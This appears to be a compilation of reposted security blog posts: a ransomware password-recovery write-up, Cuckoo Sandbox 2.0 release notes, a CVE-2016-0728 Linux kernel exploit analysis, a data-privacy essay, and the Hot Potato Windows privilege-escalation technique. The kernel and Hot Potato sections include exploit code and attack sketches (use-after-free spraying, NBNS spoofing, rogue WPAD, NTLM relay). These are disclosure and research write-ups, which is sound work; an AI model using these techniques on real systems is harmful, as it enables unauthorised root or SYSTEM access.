char pwrandom[51];
// loop through a range of seed values around the determined names seed value
for (unsigned int seed = namesseed - 32768; seed <= namesseed + 180000; seed++)
{
    // seed the PRNG with a candidate password seed value
    RandomSeed(seed);
    // discard three random numbers
    Rnd(77); Rnd(77); Rnd(77);
    pwrandom[50] = '\0';
    // generate the fifty-char random portion of the password corresponding to
    // the candidate seed value, using the alphabet extracted from the ransomware
    // Rnd(77): from 0 to 77 inclusive (this alphabet contains 78 characters)
    for (size_t i = 0; i < 50; i++)
        pwrandom[i] = "abc…xyzABC…XYZ0123456789!@#$%^&*&*()-+_="[Rnd(77)];
    // output the full password; this output can be captured to compile a list
    printf("%s\n", pwrandom);
}
Running this code with its output redirected into a text file gave us a roughly 12MB list of passwords to test, which compares very favorably to the 236GB text file we would need to hold all 4 billion possibilities if we hadn’t been able to narrow down the password seed value. With the list in hand, we cobbled together a crude batch file to run the free archive utility 7-Zip against an encrypted RAR self-extractor, testing in sequence each password in the list. 7-Zip seemed to experience some false positives when detecting a successful decryption, so we used “find” to search for output that was very likely to appear if and only if the file decrypted into something sensible. Here’s what the batch file looked like:
@for /f %%p in (pwlist.txt) do @(
    7z.exe l "testtargetfile_0123456789abcdef.docx(!! to decrypt email id … to … !!).exe" "-p%%p" 2>&1 | find ".."
    if NOT ERRORLEVEL 1 (echo "%%p")
)
We let the batch file run overnight, and by morning it had finished with exactly one password waiting for us on the screen–the correct password. Our experiment was a success! We had earned the victim’s faith in us, and at last, we were ready to get their data back.
Original Post: http://blog.cylance.com/cracking-ransomware
The time has come for a new release of Cuckoo Sandbox, version 2.0 RC1. This release comes just shy of 10 months after our 1.2 release, but development on the 2.0 release had already started over a year and a half ago.
Because we consider Cuckoo Sandbox 2.0 to be our largest release yet, and because a number of features are still in an alpha or beta stage, we decided to initiate the release process with a Release Candidate, number 1. In practice this means that users will see a couple more Release Candidates in the upcoming months before we hit 2.0 stable, and through this process we’ll be able to identify and fix bugs, extend the existing features, and complete the ones that remain unfinished. In other words, we invite our users to check this version out, use it and test it, and help us get to 2.0 faster. Please note: as mentioned, a few features are incomplete, and some have broken in the process (e.g., the web interface’s search), so be aware of this before deploying this version in any production environment.
In this blog post we will go through the details of some of the most interesting new additions to Cuckoo Sandbox 2.0-rc1, but for those who get bored quickly, here’s a short list of what has been introduced in this release:
This is just one example of what the new analysis instrumentation can achieve. We will go more in depth on many of the new features it introduces in following blog posts.
As part of GSoC 2015 (Google Summer of Code), Dmitry Rodionov built a wonderful Mac OS X analyzer for Cuckoo Sandbox. As OS X analysis depends on having a functional OS X virtual machine, you will either have to run Mac OS X as a host system or use a Hackintosh VM. Please be aware that the latter may be a breach of Apple’s Terms of Service; we take no responsibility.
The OS X analyzer is based on DTrace, a powerful dynamic tracing framework built right into the OS X kernel, which is capable of tracing user-land processes as well as in-kernel activity. DTrace comes with its own scripting language (basically a subset of C), and in order to facilitate the configuration process, the analyzer comes with a DTrace code generator based on a precompiled list of APIs of interest.
In the meantime Mark Schloesser has been focusing his efforts on providing Cuckoo with proper Linux analysis. Using a couple of slick SystemTap scripts Cuckoo has learned how to properly analyze the latest samples that were dropped as part of Shellshock and ElasticSearch exploit rounds.
In theory Linux analysis is pretty simple: just trace syscalls executed by the target binary and its child processes. There are a few existing projects, such as Sysdig, LTTng and SystemTap, that allow us to do this, and they mostly make use of the kernel’s mainline tracing subsystems in order to monitor it. Sadly, we start to run into issues when we want to cover multiple architectures. Some approaches work on x86, some on x64, some on both. It’s an even bigger problem when you extend to ARM, MIPS and other platforms. In addition, some malware requires a specific environment, for example when it targets embedded devices. We looked at malware that needs an OpenWRT environment and were able to prepare that in Cuckoo and analyze the malware.
In the end the current Linux analyzer uses SystemTap, which is not our favorite design, but it has worked relatively well across all platforms. In order to run the non-native platforms we implemented a QEMU machinery module, but x86/x64 analysis can also be done with VirtualBox, KVM, etc. The VM needs to run our Python agent as always, and for system call traces it needs SystemTap, or at least the “staprun” tool together with a precompiled SystemTap kernel module. The analyzer can also fall back to strace, but that has been shown to lose track of child processes, and we also did not implement a parser for its output. For SystemTap traces we parse the output and can thus display it exactly like the Windows API logs in the web interface.
There are quite a few areas that could be improved about this Linux implementation – but it’s simple and works for most of the samples we looked at.
Now that we cover most major platforms for analysis, Android naturally could not stay behind. Thanks to a lot of work from Idan Revivo, the Cuckoo team has been able to integrate Android analysis. Idan still actively maintains his original version of Cuckoo with Android analysis, also known as CuckooDroid, adding new signatures as interesting new malicious Android samples are found.
CuckooDroid is based on running the Android emulator through adb (and therefore also supports running analyses on actual/native Android devices!) and intercepts behavior from samples by hooking into the Dalvik/Java runtime. To perform this interception a monitor, Droidmon, has been developed; through the Xposed framework it is loaded into every new application, where it overrides and logs various Java functions.
Quite a few functions are intercepted and more can be added by simply adding some new entries to the following JSON file.
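The post links that file rather than inlining it. Purely as an illustration of the shape such a hook list takes, an entry might look like the following; the field names here are hypothetical, not Droidmon’s actual schema:

```json
{
  "_note": "hypothetical example entry, not Droidmon's real schema",
  "hooks": [
    {
      "class_name": "android.telephony.TelephonyManager",
      "method": "getDeviceId",
      "log_return_value": true
    }
  ]
}
```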
As a majority of our users are especially interested in generated network traffic (think CERT/IR teams), we could not miss out on the opportunity to integrate Suricata, Snort, and Moloch for PCAP analysis. (Note that Will Metcalf had already integrated Suricata and Moloch support in his Cuckoo fork a while back, but here we are as well.)
Below we see the Suricata output in Cuckoo for a PCAP that we imported manually from Malware Analysis Traffic. As can be seen, there are a couple of exploit-kit-related alerts.
Now in order to determine whether we have seen any of these Suricata signatures (note that the SID is the Suricata ID of the rule that matched), IP addresses, or domain names (if you go to their respective tabs) elsewhere, we can simply click the hyperlink, which will take us to the Moloch web interface, where Cuckoo will automatically perform a query so as to match only the exact criteria we are interested in.
Within seconds one will be able to see other Cuckoo analyses which matched the given IP address, domain name, SID, etc. Note that Moloch is not only able to process PCAP files but can also be used to capture the traffic of an entire company (which is actually its main purpose), so the searching capabilities with Moloch are endless. As one community project to another, we also took the opportunity to report a remote stack buffer overflow, a couple of cross-site scripting vulnerabilities, and some out-of-bounds read crashes in the Moloch project, improving the stability of Moloch and thus also the experience of Cuckoo users who rely on it. More information can be found in this commit.
We would show Snort output as well, but unlike Suricata, where you can quickly analyze a PCAP through its unix socket support, Snort has to be run separately for each PCAP analysis, making it a CPU-intensive process (taking up to 30 seconds with one processor at 100% usage; for comparison, this is more than the CPU time required for the actual analysis in a VM).
Finally it should be noted that the usability of both Suricata and Snort is based entirely on their ruleset. Fortunately Emerging Threats (in their signatures referred to as ET as can be seen in the Suricata screenshot) provides tens of thousands of rules for free. Many of these do not really apply for our use-case, but there is definitely a gold mine of free information up for grabs that we take advantage of here 🙂
Continuing with the network part of this blog post, there have been quite some interesting developments regarding HTTP/HTTPS traffic. Namely, as Cuckoo has been able to do for over half a year now, it can extract TLS master secrets. Put in layman’s terms: by intercepting the encryption keys for TLS traffic, we are effectively able to decrypt HTTPS traffic. As described in the TLS Master Secrets blog post, a file called tlsmaster.txt will be created for each analysis which, when loaded with its associated PCAP in Wireshark, will decrypt the HTTPS traffic.
One notable fact about our approach is that it intercepts TLS transparently. We do not need to install a certificate on the VM in order to decrypt traffic; we only require the ability to extract the TLS master secrets and, obviously, the PCAP file, which we cross-reference with the encryption keys. HTTPS decryption in Cuckoo Sandbox therefore works even with applications that use certificate pinning. (As with any other generic approach, it does not support TLS interception of applications that statically ship their own SSL/TLS library.)
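Wireshark consumes such key files in the NSS key log format; assuming tlsmaster.txt follows that standard format, each line pairs a session’s client random with its master secret, both hex-encoded (the hex digits below are elided placeholders, not real values):

```
# one line per TLS session: CLIENT_RANDOM, 64 hex chars of the
# handshake's client random, then 96 hex chars of the master secret
CLIENT_RANDOM 5254ab…e01f 9f3d07…77c2
```

Pointing Wireshark’s “(Pre)-Master-Secret log filename” preference at this file is what lets it decrypt the matching sessions in the PCAP.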
After our users had been struggling with network routing in Cuckoo for about five years, it was time for us to step up our game. Easier said than done, but with some help from Erik Kooijstra and n3sfox we made quick progress. Through a couple of simple configuration options one can define a default dirty line and one or more VPNs, and in a coming release it will be possible to route to services such as FakeNet and InetSim as well. Keep in mind that this functionality is currently only supported on Ubuntu/Debian and that it requires running an extra script shipped with Cuckoo as root; this script runs specific commands as directed by Cuckoo (all of this so Cuckoo itself can be run as non-root, as we recommend).
While late in delivery to you all, Christmas Doge brought us this nifty new feature:
While in the process of getting more accurate and actionable data we have also been putting in a fair bit of work on improving and adding new Signatures. With a special thanks to RedSocks, who contributed over 200 new Signatures, we are now running over 300 Signatures on each analysis.
You can download them with:
cuckoo $ ./utils/community.py -waf
In addition we have implemented a basic maliciousness score for each report, quantifying an average level of suspiciousness derived from the patterns identified by the available signatures. Do note that a low score does not per se indicate a benign sample, but a higher score definitely does indicate potential malware. In fact, from our perspective, a malicious sample with a low score is more interesting than a sample with a score of 6 to 10, as for the latter we know right away that it is malicious.
In the following screenshots we are looking at a Poweliks sample – a sample performing so well in our sandbox that it scores more than 10 out of 10 points.
Our list of TODO items is virtually never ending, but usually when users or potential contributors reach out with specific feature requests or suggestions, we try to prioritize them. Thanks to Bart Mauritz and Joshua Beens, who made a Proof of Concept on the creation of baseline captures for each VM, Cuckoo is now able to differentiate between the Volatility results captured after an analysis and the Volatility results captured without any analysis at all.
The baseline processing module will pretty much subtract the two Volatility result sets from each other, resulting in a quick overview of the Volatility results that are new after the analysis and the results that are no longer present after the analysis. As an example, one will quickly be able to see which services got stopped, which kernel drivers were added, etc.
In the following screenshot we are looking at the baseline difference of an analysis of http://www.google.com/. Now there is nothing special about that, but it does show that some random Yahoo-related processes disappeared, that some other random search processes were started, and that pythonw.exe was started as well. This last pythonw.exe is started, and keeps running until the end, in order to guide the analysis as it progresses. More notably, there are no new Internet Explorer processes in the difference; this can be explained by the fact that Internet Explorer was closed/terminated before the end of the analysis and thus does not show up in the Volatility results.
For a while we have supported Yara rules – and we are still supporting Yara rules. But sometimes it is good enough to simply extract URLs from a memory dump, some dropped files, or simply the submitted binary. This has already helped us facilitate and systematize the extraction of command-and-control information from a number of malware families. You can expect some more automation in this regard in future releases.
To conclude this feature preview, we come to one that has long been requested by many of our users. In some circumstances, especially in the case of malware designed to spread through and target corporate networks, the sample might attempt to scan, identify, and spread through additional servers available in the local network. Or, for example, it might try to access and collect resources from nearby services. From this version on, Cuckoo is able to run one or more virtual machines next to your standard analysis virtual machine in order to mimic a somewhat more realistic and juicy environment.
This functionality is in a very primitive stage, but we are looking forward to supporting more realistic honeypot scenarios. At the moment it is possible to start one or more VMs hosting services such as vulnerable HTTP, SMTP, and FTP servers, but in the future we are looking to properly support Active Directory servers, in order to replicate a realistic corporate environment.
The length of this blog post is just a reflection of the size of the upcoming Cuckoo Sandbox 2.0 release. We are very excited about it, we invested a lot of time and effort in bringing it to you, and we are hopeful that you will welcome these recent developments with as much excitement.
We are looking forward to your feedback, bug reports, and feature requests, and we welcome everybody in our IRC channel (#cuckoosandbox on FreeNode) to discuss the future of this project with us.
In case you missed it, we also launched our new Community platform. We completely replaced the previous site with new software, so the old content is momentarily missing. We will try to migrate and restore it in the future.
For the moment, that is all from us. We hope you will enjoy this release.
Original Post: https://cuckoosandbox.org/2016-01-21-cuckoo-sandbox-20-rc1.html
The Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered it only recently, disclosed the details to the kernel security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither we nor the kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.
In this write-up, we’ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.
CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details, let’s cover some background required to understand the bug.
Quoting directly from its man page, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces are provided so that userspace programs can manage those objects and use the facility for their own purposes: chiefly the keyctl syscall (there are two other syscalls used for handling keys, add_key and request_key; keyctl, however, is definitely the most important one for this write-up).
Each process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name) and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object’s internal refcount, stored in a field called usage, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, execution jumps to the error2 label, which skips the call to key_put and leaks the reference that was increased by find_keyring_by_name.
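The snippet in question appeared as an image in the original post. Paraphrased from the 3.18-era join_session_keyring(), the relevant branch looks roughly like this; it is abridged from memory, so treat it as a sketch rather than the verbatim kernel source:

```c
	keyring = find_keyring_by_name(name, false);
	if (PTR_ERR(keyring) == -ENOKEY) {
		/* not found: install a fresh session keyring */
		...
	} else if (IS_ERR(keyring)) {
		ret = PTR_ERR(keyring);
		goto error2;
	} else if (keyring == new->session_keyring) {
		ret = 0;
		goto error2;	/* BUG: skips the key_put() below, leaking the
				 * reference taken by find_keyring_by_name() */
	}
```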
Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:
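The original trigger snippet was likewise an image. A minimal reconstruction could look like the following; it uses the raw syscall so it needs no libkeyutils, the name and iteration count are ours (chosen to match the 100-reference output described below), and it requires Linux with keyring syscalls available (sandboxes often block them):

```c
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

#define KEYCTL_JOIN_SESSION_KEYRING 1

int main(void) {
    long serial = 0;
    /* re-joining the same named session keyring over and over:
     * each repeat call leaks one reference on "leaked-keyring" */
    for (int i = 0; i < 100; i++) {
        serial = syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING,
                         "leaked-keyring");
        if (serial < 0) {
            perror("keyctl");
            return 1;
        }
    }
    printf("keyring serial: %ld\n", serial);
    return 0;
}
```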
which results in the following output, showing “leaked-keyring” holding 100 references:
Even though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the object’s reference count is of type atomic_t, which under the hood is basically an int, meaning 32 bits on both 32-bit and 64-bit architectures. While every integer can theoretically be overflowed, this particular observation makes practical exploitation of this bug as a way to overflow the reference count seem feasible. And it turns out no checks are performed to prevent the usage field from wrapping around to 0.
If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free it. If the same process holds another legitimate reference and uses it after the kernel has freed the object, it will cause the kernel to reference deallocated, or reallocated, memory. This way, we can achieve a use-after-free using the exact same bug. A lot has been written on exploiting use-after-free vulnerabilities in the kernel, so the following steps won’t surprise an experienced vulnerability researcher. The outline of the steps to be executed by the exploit code is as follows:
Step 1 comes straight out of the man page; step 2 was explained earlier. Let’s dive into the technical details of the remaining steps.
This step is actually an extension of the bug. The usage field is of int type, which means it can hold at most 2^32 distinct values on both 32-bit and 64-bit architectures. To overflow the usage field we have to run the snippet above 2^32 times so that usage wraps around to zero.
There are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem which frees any keyring object the moment the usage counter is 0.
One caveat, though: if we look at join_session_keyring, prepare_creds also increments the current session keyring’s reference count, and abort_creds or commit_creds decrements it respectively. The problem is that abort_creds doesn’t decrement the keyring’s usage field synchronously; it is called later as an RCU job, which means we can overflow the usage counter without knowing it. It is possible to solve this issue by calling sleep(1) after each call to join_session_keyring, but of course it is not feasible to sleep 2^32 seconds in total. A feasible workaround is to use a variation of divide and conquer and sleep after 2^31-1 calls, then after 2^30-1, and so on. This way we never overflow unintentionally, because the value of the refcount can be at most double what it should be if no deferred jobs have run.
With our process pointing to a freed keyring object, we now need to allocate a kernel object that will override the freed keyring object. That is easy thanks to how the SLAB allocator works: we allocate many objects of the keyring’s size just after the object is freed. We chose to use the Linux IPC subsystem to send messages of size 0xb8 - 0x30, where 0xb8 is the size of the keyring object and 0x30 is the size of a message header.
This way we control the lower 0x88 bytes of the keyring object.
From here it’s pretty easy, thanks to the struct key_type inside the keyring object, which contains many function pointers. An interesting one is the revoke function pointer, which can be invoked using the keyctl(KEYCTL_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:
The keyring object should be filled as follows:
The uid and flags attributes should be filled in that way to pass a few control checks until execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers, with revoke pointing to a function that will be executed with root privileges. Here is a code snippet that demonstrates this.
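The demonstration snippet was an image in the original post. The idea, sketched below with hypothetical helper and variable names, is that key->type is redirected to attacker-controlled memory whose revoke slot points at a userspace function:

```c
/* runs in kernel context once key->type->revoke fires */
static int userspace_revoke(struct key *key)
{
    /* commit_creds/prepare_kernel_cred addresses are resolved per
     * kernel build, e.g. from /proc/kallsyms */
    commit_creds(prepare_kernel_cred(0));
    return 0;
}

/* in the sprayed fake keyring (names here are illustrative): */
fake_key_type.revoke = (void *)userspace_revoke;
fake_keyring->type  = &fake_key_type;

/* then trigger it from userspace: */
keyctl(KEYCTL_REVOKE, leaked_key_serial);
```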
Addresses of commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device.
Now the last step is of course:
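The closing snippet was also an image in the original; the customary ending of such an exploit, reconstructed here as a sketch, checks the new credentials and spawns a shell:

```c
if (getuid() == 0) {
    fprintf(stderr, "got root!\n");
    execl("/bin/sh", "/bin/sh", NULL);
}
```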
Here is a link to the full exploit, which runs on kernel 3.18 64-bit. The following is the output of running the full exploit, which takes about 30 minutes on an Intel Core i7-5500 CPU (usually time is not an issue in a privilege escalation exploit):
The vulnerability affects any Linux kernel from version 3.8 onwards. SMEP and SMAP make it more difficult to exploit, as does SELinux on Android devices. Maybe we’ll talk about tricks to bypass those mitigations in upcoming posts; in any case, the most important thing for now is to patch it as soon as you can.
Thanks to David Howells, Wade Mealing and the whole Red Hat security team for the fast response and the cooperation in fixing the bug.
Perception Point Research Team
Original Post: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
The premise of this post is simple: If you are watching/viewing porn online in 2015, even in Incognito mode, you should expect that at some point your porn viewing history will be publicly released and attached to your name.
This is an uncomfortable topic to talk/write about, which perhaps contributes to how we’ve arrived at the current state. So, to understand the threat, start with some technical considerations:
If a malicious party obtained identifiable access logs for just one of the websites that know your name, and view logs for just one of the adult websites you’ve visited, it could infer with very high probability – beyond plausible deniability – a list of porn you’ve viewed. At any time, somebody could post a website that allows you to search for anybody by email or Facebook username and view their porn browsing history. All that’s needed are two nominal data breaches and an enterprising teenager who wants to create havoc.
In 2014 a set of celebrities had naked photos released to the public, a deeply disturbing event that was fantastically labeled “the fappening”. Many people brushed off the episode – oh well, I’m not a celebrity. But I think the next big internet privacy crisis could expose the private and potentially embarrassing personal data of regular people to their neighbors – perhaps as described here, perhaps in a different form. I worry about the policy measures that could be hastily enacted in response to such an event – yet another reason the tech community should take a more proactive approach to ensuring data privacy.
Original Post: http://brettpthomas.com/online-porn-could-be-the-next-big-privacy-scandal.html
Using Shodan from the Command-Line
Have you ever needed to write a quick script to download data from Shodan? Or setup a cronjob to check what Shodan found on your network recently? How about getting a list of IPs out of the Shodan API? For the times where you’d like to have easy script-friendly access to Shodan there’s now a new command-line tool appropriately called shodan.
The shodan command-line interface (CLI) is packaged with the official Python library for Shodan, which means if you’re running the latest version of the library you already have access to the CLI. To install the new tool in Linux simply execute:
Or if you’re running an older version of the Shodan Python library and want to upgrade:
Once the tool is installed, you have to initialize the environment with your API key using shodan init:
At the moment, the shodan CLI supports 6 commands.
Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
If this sounds vaguely familiar, it’s because a similar technique was disclosed by the guys at Google Project Zero – https://code.google.com/p/google-security-research/issues/detail?id=222 . In fact, some of our code was shamelessly borrowed from their PoC and expanded upon.
Using this technique, we can elevate our privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.
This is important because many organizations unfortunately rely on Windows account privileges to protect their corporate network. Often it is the case that once an attacker is able to gain high privileged access to ANY workstation or server on a Windows network, they can use this access to gain “lateral movement” and compromise other hosts on the same domain. As an attacker, we often gain access to a computer through a low privilege user or service account. Gaining high privilege access on a host is often a critical step in a penetration test, and is usually performed in an ad-hoc manner as there are no known public exploits or techniques to do so reliably.
The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches. Each part corresponds to an already well known attack that has been in use for years:
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. When you (or Windows) perform a DNS lookup, first Windows will check the “hosts” file. If no entry exists, it will then attempt a DNS lookup. If this fails, an NBNS lookup will be performed. The NBNS protocol basically just asks all hosts on the local broadcast domain “Who knows the IP address for host XXX?”. Any host on the network is free to respond however they wish.
In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. We will impersonate all hosts, replying to every request with our IP address in hopes that the resulting connection will do something interesting, like try to authenticate.
For privilege escalation purposes, we can’t assume that we are able to sniff network traffic. Why? Because this requires local administrator access. So how can we accomplish NBNS spoofing?
If we can know ahead of time which hostname a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a fake response and flood the target host with NBNS responses very quickly (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response, and we are unable to see the request. We can overcome this by flooding quickly and iterating over all 65536 possible values.
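As an illustration of the idea only (the Potato tool itself is C#, and this is not its actual code), crafting an NBNS response and spraying it for every possible TXID could be sketched in Python like this; the packet layout follows RFC 1002, and the flag values are a plausible choice, not necessarily the exploit's:

```python
import socket
import struct

def encode_netbios_name(name: str) -> bytes:
    """First-level NetBIOS name encoding: pad the name to 15 chars,
    append a 0x00 service-suffix byte, then map each nibble of each
    byte to a letter in 'A'..'P'."""
    padded = name.upper().ljust(15) + "\x00"  # 0x00 = workstation service
    out = bytearray([0x20])                   # length of the encoded label
    for ch in padded.encode("ascii"):
        out.append(0x41 + (ch >> 4))
        out.append(0x41 + (ch & 0x0F))
    out.append(0x00)                          # end of name
    return bytes(out)

def build_nbns_response(txid: int, name: str, ip: str) -> bytes:
    """Positive NBNS name-query response mapping `name` to `ip`."""
    header = struct.pack(">HHHHHH",
                         txid,
                         0x8500,   # response, authoritative answer
                         0, 1, 0, 0)
    body = (encode_netbios_name(name)
            # type NB (0x0020), class IN, TTL, RDLENGTH 6
            + struct.pack(">HHIH", 0x0020, 0x0001, 165, 6)
            + struct.pack(">H", 0x0000)       # NB flags: unique, B-node
            + socket.inet_aton(ip))
    return header + body

def flood(name: str, ip: str, target: str = "127.0.0.1") -> None:
    """Spray a response for every possible TXID at the target's NBNS port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for txid in range(0x10000):
        sock.sendto(build_nbns_response(txid, name, ip), (target, 137))
```

Calling flood("WPAD", attacker_ip) would send ~65k datagrams at the local NBNS port; whichever one happens to match the pending query's TXID wins the race.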
What if the network we are targeting has a DNS record for the host we want to spoof? We can use a technique called UDP port exhaustion to force ALL DNS lookups on the system to fail. All we do is bind to EVERY single UDP port. This causes DNS to fail because there will be no available UDP source port for the request. When DNS fails, NBNS will be the fallback.
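A sketch of the port-exhaustion idea in Python (illustrative only; the real exploit does this from its own code, and the port range parameter here is just for demonstration):

```python
import socket

def exhaust_udp_ports(start: int = 1, stop: int = 65536):
    """Bind a socket to every UDP port in [start, stop) and return the
    sockets. While they are held, the OS has no free UDP source port in
    that range for an outgoing DNS query, so on Windows name resolution
    falls back to NBNS."""
    held = []
    for port in range(start, stop):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.bind(("0.0.0.0", port))
            held.append(s)   # keep the reference so the port stays bound
        except OSError:
            s.close()        # already in use or privileged; skip it
    return held
```

Note that holding all ~65k sockets requires a suitably raised file-descriptor limit; the principle is simply that a bound port cannot be handed out as an ephemeral source port.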
In testing, this has proved to be 100% effective due to the speed at which we are able to send UDP packets to 127.0.0.1.
In Windows, Internet Explorer by default will automatically try to detect network proxy setting configuration by accessing the URL “http://wpad/wpad.dat”. This also surprisingly applies to some Windows services such as Windows Update, but exactly how and under what conditions seems to be version dependent.
Of course, the URL “http://wpad/wpad.dat” won’t exist on all networks, because the hostname “wpad” won’t necessarily exist in the DNS nameserver. However, as we saw above, we can spoof host names using NBNS spoofing.
With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for “http://wpad/wpad.dat”, it responds with something like the following:
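The exploit's exact wpad.dat isn't reproduced here, but a minimal stand-in for such a server, written in Python, might serve a PAC file that routes everything through a proxy on 127.0.0.1 (the proxy port and PAC contents below are illustrative assumptions, not the exploit's actual response):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Illustrative PAC file: route every URL through a proxy on 127.0.0.1:80.
WPAD_DAT = (
    'function FindProxyForURL(url, host) {\n'
    '    return "PROXY 127.0.0.1:80";\n'
    '}\n'
)

class WpadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/wpad.dat":
            body = WPAD_DAT.encode("ascii")
            self.send_response(200)
            self.send_header("Content-Type",
                             "application/x-ns-proxy-autoconfig")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(404)
            self.end_headers()

# To run (port 80 normally needs elevated privileges):
# HTTPServer(("127.0.0.1", 80), WpadHandler).serve_forever()
```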
This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.
Interestingly, this attack, even when performed by a low privilege user, will affect all users of the machine, including administrators and system accounts. The following screenshots show two users simultaneously logged into the same machine: the low privilege user is performing local NBNS spoofing in the first, and the high privilege user is shown to be affected in the second.
NTLM relay is a well known, but often misunderstood attack against Windows NTLM authentication. The NTLM protocol is vulnerable to man-in-the-middle attacks. If an attacker can trick a user into trying to authenticate using NTLM to his machine, he can relay that authentication attempt to another machine!
The old version of this attack had the victim attempting to authenticate to the attacker using the SMB protocol with NTLM authentication. The attacker would then relay those credentials back to the victim’s computer and gain remote access using a “psexec” like technique.
Microsoft patched this by disallowing same-protocol NTLM authentication using a challenge that is already in flight. What this means is that SMB->SMB NTLM relay from one host back to itself will no longer work. However cross-protocol attacks such as HTTP->SMB will still work with no issue!
With all HTTP traffic now presumably flowing through an HTTP server that we control, we can do things like redirect them somewhere that will request NTLM authentication.
In the Potato exploit, all HTTP requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
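A rough Python stand-in for that redirect-then-challenge behavior might look like the following. The identifier is illustrative, and the real exploit additionally relays the resulting NTLM blobs to its local SMB listener, which this sketch omits entirely:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class RelayHandler(BaseHTTPRequestHandler):
    """Funnel every proxied request toward an NTLM challenge:
    302-redirect first, then demand NTLM authentication."""

    def do_GET(self):
        if self.path.startswith("/GETHASHES"):
            # Demand NTLM; in the real exploit the client's reply
            # would be relayed to the local SMB listener.
            self.send_response(401)
            self.send_header("WWW-Authenticate", "NTLM")
            self.end_headers()
        else:
            # Redirect any proxied request to the hash-collection URL
            # (the "12345" identifier here is a made-up example).
            self.send_response(302)
            self.send_header("Location",
                             "http://localhost/GETHASHES12345")
            self.end_headers()
```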
Any NTLM credentials are then relayed to the local SMB listener to create a new system service that runs a user-defined command.
When the HTTP request in question originates from a high privilege account, for example, when it is a request from the Windows Update service, this command will run with “NT AUTHORITY\SYSTEM” privilege!
Usage is currently operating system dependent.
It is also a bit flaky at times, due to quirks in how Windows handles proxy settings and the WPAD file. Often, when the exploit doesn’t work, you need to leave it running and wait. When Windows already has a cached entry for WPAD, or is allowing direct internet access because no WPAD was found, it can take 30-60 minutes for it to refresh the WPAD file. It is necessary to leave the exploit running and try to trigger it again after this time has elapsed.
The techniques listed here are ordered from least to most complex. Any technique later in the list should work on all versions previous. Videos and screenshots are included for each.
Windows 7 can be fairly reliably exploited through the Windows Defender update mechanism.
Potato.exe has code to automatically trigger this. Simply run the following:
This will spin up the NBNS spoofer, spoof “WPAD” to 127.0.0.1, then check for Windows Defender updates.
If your network has a DNS entry for “WPAD” already, you can try “-disable_exhaust false”. This should cause the DNS lookup to fail and it should fallback to NBNS. This seems to work pretty reliably on Windows 7.
Since Windows Server doesn’t come with Defender, we need an alternate method. Instead we’ll simply check for Windows updates. The other caveat is that, at least on my domain, Server 2K8 wanted WPAD.DOMAIN.TLD instead of just WPAD. The following is an example usage:
After this runs successfully, simply check for Windows updates. If it doesn’t trigger, wait about 30 minutes with the exploit running and check again. If it still doesn’t work, try actually downloading an update.
If your network has a DNS entry for “WPAD” already, you can try “-disable_exhaust false”, however it might break things here. Doing DNS port exhaustion causes ALL DNS lookups to fail. The Windows Update process may need to do a few DNS lookups before reaching out for WPAD. You would have to nail the timing JUST right to get it working in this case.
In the newest versions of Windows, it appears that Windows Update may no longer respect the proxy settings set in “Internet Options”, or check for WPAD. Instead proxy settings for Windows Update are controlled using “netsh winhttp proxy…”
